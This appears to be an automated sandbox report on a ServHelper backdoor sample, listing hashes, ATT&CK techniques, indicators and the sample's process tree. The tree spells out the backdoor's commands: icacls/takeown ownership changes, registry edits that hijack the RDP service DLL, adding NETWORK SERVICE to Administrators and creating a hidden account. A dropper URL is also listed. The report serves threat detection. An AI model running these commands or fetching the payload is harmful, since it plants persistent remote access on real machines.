servhelper | f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab

Analysis

max time kernel
133s
max time network
173s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
19-04-2022 06:01

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
Size

3.5MB
MD5

430153f225c19501842717a80283c9ed
SHA1

b53056dd325af27d8c295731dbbe102ace42def6
SHA256

f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab
SHA512

a9051ad3af63a3bed0c63ab7e6ea26a8b4fc944bbf4eca394f1ea07f645c0fd94551fe2b33d86ca62fc86f6ee2ee515ad95b51473511466a679858468cdba8d2

Score

10^/10

servhelper backdoor discovery exploit persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 10 IoCs

Processes:

powershell.exe

flow	pid	process
33	4368	powershell.exe
36	4368	powershell.exe
37	4368	powershell.exe
39	4368	powershell.exe
40	4368	powershell.exe
42	4368	powershell.exe
45	4368	powershell.exe
47	4368	powershell.exe
49	4368	powershell.exe
52	4368	powershell.exe

Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

icacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exeicacls.exe

pid process

404 icacls.exe
5004 icacls.exe
1648 icacls.exe
1976 icacls.exe
2200 takeown.exe
3860 icacls.exe
3500 icacls.exe
3512 icacls.exe
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
404	icacls.exe
5004	icacls.exe
1648	icacls.exe
1976	icacls.exe
2200	takeown.exe
3860	icacls.exe
3500	icacls.exe
3512	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\Branding\mediasrv.png	upx
C:\Windows\Branding\mediasvc.png	upx

Loads dropped DLL 2 IoCs

Processes:

pid process

2284
2284
Modifies file permissions 1 TTPs 8 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

3512 icacls.exe
404 icacls.exe
5004 icacls.exe
1648 icacls.exe
1976 icacls.exe
2200 takeown.exe
3860 icacls.exe
3500 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe

pid	process
2284
2284

pid	process
3512	icacls.exe
404	icacls.exe
5004	icacls.exe
1648	icacls.exe
1976	icacls.exe
2200	takeown.exe
3860	icacls.exe
3500	icacls.exe

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 18 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\shellbrd	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBB61.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBB90.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File created	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBC01.tmp	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_1cvts5ze.mgh.ps1	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_j5xyjmae.y3s.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBBA1.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\RGIBBD1.tmp	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

3768 4984 WerFault.exe f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe

pid	pid_target	process	target process
3768	4984	WerFault.exe	f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\IE5_UA_Backup_Flag = "5.0"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\DisplayName = "Restricted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\DisplayName = "Restricted sites"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\DisplayName = "My Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map\57fd7ae31ab34c2c = ",33,HKCU,SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\5.0\\Cache\\Extensible Cache,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\PMDisplayName = "Internet [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\http = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyByPass = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Flags = "33"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Ranges	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map\2ba02e083fadee33 = ",33,HKCU,Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings,IE5_UA_Backup_Flag,"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\1400 = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4600 reg.exe
Runs net.exe

pid	process
4600	reg.exe

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc	stream
HTTP User-Agent header	40	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	42	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	36	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	37	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)	1
HTTP User-Agent header	39	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 7 IoCs

Processes:

powershell.exepowershell.exe

pid process

1756 powershell.exe
1756 powershell.exe
1756 powershell.exe
1756 powershell.exe
1756 powershell.exe
4368 powershell.exe
4368 powershell.exe
Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

652
652

pid	process
1756	powershell.exe
1756	powershell.exe
1756	powershell.exe
1756	powershell.exe
1756	powershell.exe
4368	powershell.exe
4368	powershell.exe

pid	process
652
652

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

powershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1756	powershell.exe
Token: SeRestorePrivilege	3500	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	1452	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1452	WMIC.exe
Token: SeAuditPrivilege	1452	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	1452	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1452	WMIC.exe
Token: SeAuditPrivilege	1452	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2240	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2240	WMIC.exe
Token: SeAuditPrivilege	2240	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2240	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2240	WMIC.exe
Token: SeAuditPrivilege	2240	WMIC.exe
Token: SeDebugPrivilege	4368	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 4984 wrote to memory of 1756	4984	f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe	powershell.exe
PID 4984 wrote to memory of 1756	4984	f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe	powershell.exe
PID 1756 wrote to memory of 1108	1756	powershell.exe	csc.exe
PID 1756 wrote to memory of 1108	1756	powershell.exe	csc.exe
PID 1108 wrote to memory of 3712	1108	csc.exe	cvtres.exe
PID 1108 wrote to memory of 3712	1108	csc.exe	cvtres.exe
PID 1756 wrote to memory of 2200	1756	powershell.exe	takeown.exe
PID 1756 wrote to memory of 2200	1756	powershell.exe	takeown.exe
PID 1756 wrote to memory of 3860	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 3860	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 3500	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 3500	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 3512	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 3512	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 404	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 404	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 5004	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 5004	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 1648	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 1648	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 1976	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 1976	1756	powershell.exe	icacls.exe
PID 1756 wrote to memory of 4232	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 4232	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 4600	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 4600	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 2940	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 2940	1756	powershell.exe	reg.exe
PID 1756 wrote to memory of 220	1756	powershell.exe	net.exe
PID 1756 wrote to memory of 220	1756	powershell.exe	net.exe
PID 220 wrote to memory of 4120	220	net.exe	net1.exe
PID 220 wrote to memory of 4120	220	net.exe	net1.exe
PID 1756 wrote to memory of 5096	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 5096	1756	powershell.exe	cmd.exe
PID 5096 wrote to memory of 2332	5096	cmd.exe	cmd.exe
PID 5096 wrote to memory of 2332	5096	cmd.exe	cmd.exe
PID 2332 wrote to memory of 3156	2332	cmd.exe	net.exe
PID 2332 wrote to memory of 3156	2332	cmd.exe	net.exe
PID 3156 wrote to memory of 2156	3156	net.exe	net1.exe
PID 3156 wrote to memory of 2156	3156	net.exe	net1.exe
PID 1756 wrote to memory of 1088	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 1088	1756	powershell.exe	cmd.exe
PID 1088 wrote to memory of 4028	1088	cmd.exe	cmd.exe
PID 1088 wrote to memory of 4028	1088	cmd.exe	cmd.exe
PID 4028 wrote to memory of 2964	4028	cmd.exe	net.exe
PID 4028 wrote to memory of 2964	4028	cmd.exe	net.exe
PID 2964 wrote to memory of 3348	2964	net.exe	net1.exe
PID 2964 wrote to memory of 3348	2964	net.exe	net1.exe
PID 1756 wrote to memory of 3412	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 3412	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 3352	1756	powershell.exe	cmd.exe
PID 1756 wrote to memory of 3352	1756	powershell.exe	cmd.exe
PID 3596 wrote to memory of 4068	3596	cmd.exe	net.exe
PID 3596 wrote to memory of 4068	3596	cmd.exe	net.exe
PID 4068 wrote to memory of 952	4068	net.exe	net1.exe
PID 4068 wrote to memory of 952	4068	net.exe	net1.exe
PID 3968 wrote to memory of 5064	3968	cmd.exe	net.exe
PID 3968 wrote to memory of 5064	3968	cmd.exe	net.exe
PID 5064 wrote to memory of 540	5064	net.exe	net1.exe
PID 5064 wrote to memory of 540	5064	net.exe	net1.exe
PID 5052 wrote to memory of 3964	5052	cmd.exe	net.exe
PID 5052 wrote to memory of 3964	5052	cmd.exe	net.exe
PID 3964 wrote to memory of 3984	3964	net.exe	net1.exe
PID 3964 wrote to memory of 3984	3964	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe
"C:\Users\Admin\AppData\Local\Temp\f113556c666089edb042e0fe628d12c5e705443ee004d7633f6d1ac8f129e9ab.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4984

\??\c:\windows\system32\WindowsPowerShell\v1.0\powershell.exe
-ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2o5ylb4h\2o5ylb4h.cmdline"
3⤵
- Suspicious use of WriteProcessMemory
PID:1108

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESEDDF.tmp" "c:\Users\Admin\AppData\Local\Temp\2o5ylb4h\CSC9AEA88AD1398439A97F918B61E789921.TMP"
4⤵
PID:3712

C:\Windows\system32\takeown.exe
"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2200

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3860

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:3500

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3512

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:404

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:5004

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1648

C:\Windows\system32\icacls.exe
"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1976

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
3⤵
PID:4232

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
3⤵
- Modifies registry key
PID:4600

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
3⤵
PID:2940

C:\Windows\system32\net.exe
"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
3⤵
- Suspicious use of WriteProcessMemory
PID:220

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
4⤵
PID:4120

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
3⤵
- Suspicious use of WriteProcessMemory
PID:5096

C:\Windows\system32\cmd.exe
cmd /c net start rdpdr
4⤵
- Suspicious use of WriteProcessMemory
PID:2332

C:\Windows\system32\net.exe
net start rdpdr
5⤵
- Suspicious use of WriteProcessMemory
PID:3156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start rdpdr
6⤵
PID:2156

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
3⤵
- Suspicious use of WriteProcessMemory
PID:1088

C:\Windows\system32\cmd.exe
cmd /c net start TermService
4⤵
- Suspicious use of WriteProcessMemory
PID:4028

C:\Windows\system32\net.exe
net start TermService
5⤵
- Suspicious use of WriteProcessMemory
PID:2964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 start TermService
6⤵
PID:3348

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
3⤵
PID:3412

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
3⤵
PID:3352

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4984 -s 652
2⤵
- Program crash
PID:3768

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4984 -ip 4984
1⤵
PID:4924

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Suspicious use of WriteProcessMemory
PID:3596

C:\Windows\system32\net.exe
net.exe user wgautilacc Ghar4f5 /del
2⤵
- Suspicious use of WriteProcessMemory
PID:4068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
3⤵
PID:952

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc AOSzoi1P /add
1⤵
- Suspicious use of WriteProcessMemory
PID:3968

C:\Windows\system32\net.exe
net.exe user wgautilacc AOSzoi1P /add
2⤵
- Suspicious use of WriteProcessMemory
PID:5064

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user wgautilacc AOSzoi1P /add
3⤵
PID:540

C:\Windows\System32\cmd.exe
